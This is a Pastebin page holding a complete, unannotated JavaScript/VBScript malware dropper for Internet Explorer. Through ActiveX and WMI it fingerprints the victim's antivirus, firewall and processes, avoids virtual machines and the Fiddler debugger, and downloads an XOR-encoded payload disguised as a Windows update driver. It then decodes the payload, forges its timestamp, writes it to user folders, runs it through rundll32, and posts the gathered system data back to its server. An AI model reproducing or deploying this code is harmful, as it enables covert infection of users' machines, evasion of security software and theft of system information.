Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- document.write('</textarea>');
- document.write('<!--');
- var g_lav = 'cc,bb';
- var g_lwork = 1;
- var g_ft = 1;
- var g_ts = 0;
- var g_uf = '/relax/nalogi/5/PYDRFKIP/5fead4b805bc468e6a4008be28c6ca6a';
- var g_xk = '97dc6e7aaa9c089d0ed82ebfd9fca4fe';
- var g_cb = '/sro/regions/';
- var g_fn = 'Windows6.1-KB6928566-x86.drv';
- var g_tca = 5000;
- var g_av;
- var g_path;
- var g_pc = 0;
- var g_avun = 0;
- var g_run = 0;
- var g_alive = 0;
- var g_ulvl = 0;
- var g_err = '0';
- var g_runt = new Date().getTime();
- var g_try = 2;
- var g_tryd = 5;
- window.execScript('function f_chr(c):f_chr=chr(c):end function', 'vbscript');
- window.execScript('function ieRawBytes(byteArray):ieRawBytes=CStr(byteArray):end function', 'vbscript');
- window.execScript('function ieLastChr(byteArray):Dim lastIndex:lastIndex=LenB(byteArray):if lastIndex mod 2 Then:ieLastChr=Chr(AscB(MidB(byteArray,lastIndex,1))):Else:ieLastChr="":End If:end function', 'vbscript');
- function ForEachItem(Items, Do) {
- with(new Enumerator(Items)) for (; !atEnd(); moveNext())
- if (Do(item())) break;
- }
- try {
- var aws = new ActiveXObject('WScript.Shell');
- var amx = new ActiveXObject('Microsoft.XMLHTTP');
- var aas = new ActiveXObject('ADODB.Stream');
- var wmi = new ActiveXObject('WbemScripting.SWbemLocator');
- var sfo = new ActiveXObject('Scripting.FileSystemObject');
- } catch (e) {
- g_err += 'a' + (e.number & 0xFFFF);
- f_close(1);
- }
- function f_close(r) {
- try {
- if (r) {
- var x = document.createElement('iframe');
- x.setAttribute('src', g_cb + g_err + '/00000/');
- document.body.appendChild(x);
- } else {
- g_err += '/' + g_pc + '' + g_avun + '' + g_run + '' + g_alive + '' + g_ulvl + '/' + g_av;
- postData(g_cb + g_err, obfuscateData(getWmiSC() + '\r\nModel=' + getWmiModel()));
- }
- } finally {
- setTimeout(function() {
- close()
- }, 2000);
- }
- }
- function getWmiSC() {
- try {
- var r = '';
- var c = new Array('AntiSpywareProduct', 'AntiVirusProduct', 'FirewallProduct');
- ForEachItem(c, function(l) {
- try {
- var j = wmi.ConnectServer('.', 'root\\SecurityCenter2').InstancesOf(l)
- } catch (e) {
- var j = wmi.ConnectServer('.', 'root\\SecurityCenter').InstancesOf(l)
- }
- r += l + '\r\n';
- ForEachItem(j, function(o) {
- r += o.displayName + '\r\n';
- });
- });
- } catch (e) {
- g_err += 'b' + (e.number & 0xFFFF);
- return !1;
- }
- return r;
- };
- function getWmiModel() {
- try {
- var r = '';
- var a = wmi.ConnectServer('.', 'root\\CIMV2').InstancesOf('Win32_ComputerSystem');
- ForEachItem(a, function(i) {
- r = i.Model;
- });
- } catch (e) {
- g_err += 'c' + (e.number & 0xFFFF);
- return !1;
- }
- return r;
- }
- function getWmiProcessList() {
- try {
- var r = new Array();
- var a = wmi.ConnectServer('.', 'root\\CIMV2').InstancesOf('Win32_Process');
- ForEachItem(a, function(i) {
- r.push((i.Name).toLowerCase());
- });
- } catch (e) {
- g_err += 'd' + (e.number & 0xFFFF);
- return !1;
- }
- return r;
- }
- function getWmiProcessAlive(b, p) {
- var r = 0;
- try {
- var a = wmi.ConnectServer('.', 'root\\CIMV2').InstancesOf('Win32_Process');
- ForEachItem(a, function(i) {
- if (b) {
- if (((String)(i.CommandLine).indexOf(p)) + 1) {
- r = 1;
- }
- } else {
- if ((String)(i.Name).toLowerCase().indexOf(p.toLowerCase()) + 1) {
- r = 1;
- }
- }
- });
- } catch (e) {
- g_err += 'e' + (e.number & 0xFFFF);
- var r = 0;
- }
- if (sfo.FileExists(p) && r) {
- r = 1;
- }
- return r;
- }
- function startWmiProcess(p) {
- try {
- wmi.Security_.privileges.addasstring('sedebugprivilege', !0);
- var a = wmi.ConnectServer('.', 'root\\CIMV2');
- var b = a.Get('Win32_Process').Methods_('Create').inParameters.SpawnInstance_();
- var c = a.Get('Win32_ProcessStartup').SpawnInstance_();
- c.ShowWindow = 12;
- b.Properties_.Item('CommandLine').Value = aws.ExpandEnvironmentStrings('rundll32 SHELL32.dll,ShellExec_RunDLL rundll32 "' + p + '",DllRegisterServer');
- b.Properties_.Item('ProcessStartupInformation').Value = c;
- return ((a.ExecMethod('Win32_Process', 'Create', b).ProcessId) ? 1 : 0);
- } catch (e) {
- g_err += 'f' + (e.number & 0xFFFF);
- return 0;
- }
- }
- function startProcess(p) {
- try {
- return ((aws.Run(aws.ExpandEnvironmentStrings('rundll32 SHELL32.dll,ShellExec_RunDLL rundll32 "' + p + '",DllRegisterServer'), 0, 0) + 1) ? 1 : 0);
- } catch (e) {
- g_err += 'g' + (e.number & 0xFFFF);
- return 0;
- }
- }
- function ReadFileUrl(u) {
- try {
- amx.open('GET', u, !1);
- amx.onreadystatechange = checkCompleteDownload;
- amx.send();
- return !0;
- } catch (e) {
- g_err += 'h' + (e.number & 0xFFFF);
- return !1;
- }
- }
- function checkCompleteDownload() {
- if (amx.readyState == 4 && amx.status == 200) {
- if (SaveDecodedFile(amx.responseBody, g_fn, g_xk, g_ts)) {
- amx.abort();
- runSoft();
- } else {
- f_close();
- }
- }
- }
- function getRandom(a, b) {
- return ((Math.random() * (b - a + 1)) | 0) + a;
- }
- function newTimeStamp() {
- var today = (new Date().getTime() / 1000 | 0);
- var newday = today - getRandom(0, today & 0xFFFFFF) + 1000;
- var result = function() {
- for (var i = 3, r = Array(); 0 <= i; i--) {
- r.push(((newday / Math.pow(0x100, i)) | 0) & 0xFF);
- }
- return r;
- }();
- return result;
- }
- function CreateFile(p) {
- try {
- var f, Paths = (g_ulvl) ? ['%commonprogramfiles%\\System\\', '%allusersprofile%\\Microsoft\\Windows\\', '%allusersprofile%\\', '%appdata%\\Microsoft\\', '%userprofile%\\', '%tmp%\\Low\\'] : ['%appdata%\\..\\LocalLow\\', '%userprofile\\AppData\\LocalLow\\'];
- for (var i = 0, c = Paths.length; i < c; i++) {
- try {
- g_path = aws.ExpandEnvironmentStrings(Paths[i]);
- f = sfo.CreateTextFile(g_path + p, !0);
- Paths.length = 0;
- return f;
- } catch (e) {
- g_path = 0;
- continue;
- }
- }
- Paths.length = 0;
- if (!g_path) {
- g_path = aws.ExpandEnvironmentStrings('%tmp%\\');
- return sfo.CreateTextFile(g_path + p, !0);
- }
- } catch (e) {
- g_err += 'i' + (e.number & 0xFFFF);
- return !1;
- }
- }
- function SaveDecodedFile(c, p, k, t) {
- try {
- var file = CreateFile(p);
- if (!file) {
- return !1;
- }
- var byteMapping = {};
- for (var i = 0; i < 256; i++) {
- for (var j = 0; j < 256; j++) {
- byteMapping[String.fromCharCode(i + j * 256)] = String.fromCharCode(i) + String.fromCharCode(j);
- }
- };
- var getBytes = function(byteArray) {
- var rawBytes = ieRawBytes(byteArray),
- lastChr = ieLastChr(byteArray);
- return rawBytes.replace(/[\s\S]/g, function(match) {
- return byteMapping[match];
- }) + lastChr;
- };
- var bytes = getBytes(c),
- bytelen = bytes.length,
- keylen = k.length;
- var code, xor, key, output = [],
- j = 0;
- var timestamp_firstbyte, timestamp_position, timestamp_bytes = 4,
- timestamp_today = newTimeStamp();
- for (var i = 0; i < bytelen; i++) {
- code = bytes.charCodeAt(i);
- key = k.charCodeAt(i % keylen);
- xor = (code != 0 && code != key) ? code ^ key : code;
- if (t) {
- if (i == 60) {
- timestamp_firstbyte = xor;
- } else if (i == 61) {
- timestamp_position = (xor * 256 + timestamp_firstbyte) + 8;
- }
- if (0 < timestamp_bytes && 0 < timestamp_position && timestamp_position <= i) {
- timestamp_bytes--;
- xor = timestamp_today[timestamp_bytes];
- }
- }
- output[j++] = ((127 < xor) ? f_chr(xor) : String.fromCharCode(xor));
- if (j == 1024) {
- file.Write(output.join(''));
- output = [];
- j = 0;
- }
- }
- file.Write(output.join(''));
- file.Close();
- return !0;
- } catch (e) {
- g_err += 'j' + (e.number & 0xFFFF);
- return !1;
- }
- return !0;
- }
- function postData(u, d) {
- try {
- g_runt -= new Date().getTime();
- amx.Open('POST', u, !1);
- amx.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
- amx.Send(g_runt + '=' + d);
- } catch (e) {
- g_err += 'k' + (e.number & 0xFFFF);
- return !1;
- }
- return !0;
- }
- function obfuscateData(d) {
- try {
- for (var i = 0, data = '', l = d.length; i < l; i++) {
- data += String.fromCharCode(d.charCodeAt(i) + 2);
- }
- } catch (e) {
- g_err += 'l' + (e.number & 0xFFFF);
- return !1;
- }
- return encodeURIComponent(data);
- }
- function av_identifier(p) {
- try {
- if (!p) {
- return '00';
- }
- var avlist = 'aa:avastsvc,bb:avp,cc:ekrn,cc:nod32krn,dd:mctray,dd:mcsvhost,ee:cmdagent,ff:ccsvchst,gg:psctrls,hh:avgwdsvc,hh:avgcsrvx,ii:msseces,jj:sched,kk:fshoster32,ll:gdfwsvc,mm:bdagent,nn:n360,oo:nav,pp:nis,pp:ns,qq:coreserviceshell,rr:acs,ss:dwservice,ss:dwengine,tt:pfsvc,uu:iswsvc,vv:pctssvc,vv:tfservice,ww:jpf,xx:adawareservice,yy:arcamainsv,zz:savservice,zz:savadminservice,11:tpmgma,22:npsvc32,33:inort,44:rsmgrsvc,55:guardxservice,66:solosent,66:solocfg,77:bullguardbhvscanner,88:k7tsmngr,99:qhactivedefense,ab:bhipssvc,ac:sbamcommandlinescanner,ac:sbamtray,ac:sbamsvc,ad:mbamservice,ae:semsvc,af:icrcservice,af:osceintegrationservice,af:pccntmon'.split(',');
- p = p.join(',');
- for (var i = 0, il = avlist.length, av; i < il; i++) {
- av = avlist[i].split(':');
- if ((p.indexOf(',' + av[1] + '.exe')) + 1) {
- avlist.length = 0;
- return av[0];
- }
- }
- } catch (e) {
- return '00';
- }
- return ' ';
- }
- function pc_identifier(m) {
- try {
- if (!m) {
- return 0;
- }
- var vbx = '(virtual|bochs|microsoft corporation)';
- vbx = 1 ^ (new RegExp(vbx, 'gi').test(m));
- return vbx;
- } catch (e) {
- return 0;
- }
- }
- function avunlock_identifier() {
- if (!g_av) {
- return 0;
- }
- if ((g_lav.indexOf(g_av)) + 1) {
- return 0;
- }
- return 1;
- }
- function intlvl_identifier() {
- try {
- var dt = String(sfo.GetSpecialFolder(2)).toLowerCase();
- return ((dt.substr(dt.length - 3, 3) != 'low') ? 1 : 0);
- } catch (e) {
- return 0;
- }
- }
- function deleteSoft() {
- try {
- sfo.DeleteFile(g_path + g_fn);
- } catch (e) {
- g_err += 'l' + (e.number & 0xFFFF);
- }
- }
- function checkAliveProcess(d) {
- g_alive = getWmiProcessAlive(g_ft, g_fn);
- if (--g_try) {
- if (g_alive) {
- f_close();
- } else {
- runSoft();
- }
- } else {
- deleteSoft();
- f_close();
- }
- }
- function runSoft() {
- g_run = ((g_ulvl) ? startWmiProcess(g_path + g_fn) : startProcess(g_path + g_fn));
- if (!g_run) {
- g_run = startProcess(g_path + g_fn);
- }
- if (g_run) {
- setTimeout(checkAliveProcess, g_tca);
- } else {
- f_close();
- }
- }
- function Start() {
- g_pc = pc_identifier(getWmiModel());
- g_av = av_identifier(getWmiProcessList());
- g_avun = avunlock_identifier();
- g_ulvl = intlvl_identifier();
- if (g_pc && g_avun && (g_ulvl || g_lwork)) {
- if (!ReadFileUrl(g_uf)) {
- f_close();
- }
- } else {
- f_close();
- }
- }(function chkFiddler() {
- var x = document.createElement('iframe'),
- tmrout;
- x.setAttribute('src', 'http://cdn.technet.microsoft.com');
- x.setAttribute('id', 'tstfdlr');
- if (x.attachEvent && !x.addEventListener) {
- tmrout = setTimeout(Start, getRandom(10000, 15000));
- x.attachEvent('onload', (function() {
- if ((document.frames('tstfdlr').document.activeElement.innerHTML).indexOf('Fiddler') == -1) {
- clearTimeout(tmrout);
- setTimeout(Start, getRandom(3000, 10000));
- } else {
- g_err = 'fdlr' + g_err;
- f_close();
- }
- }));
- }
- document.body.appendChild(x);
- })();
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement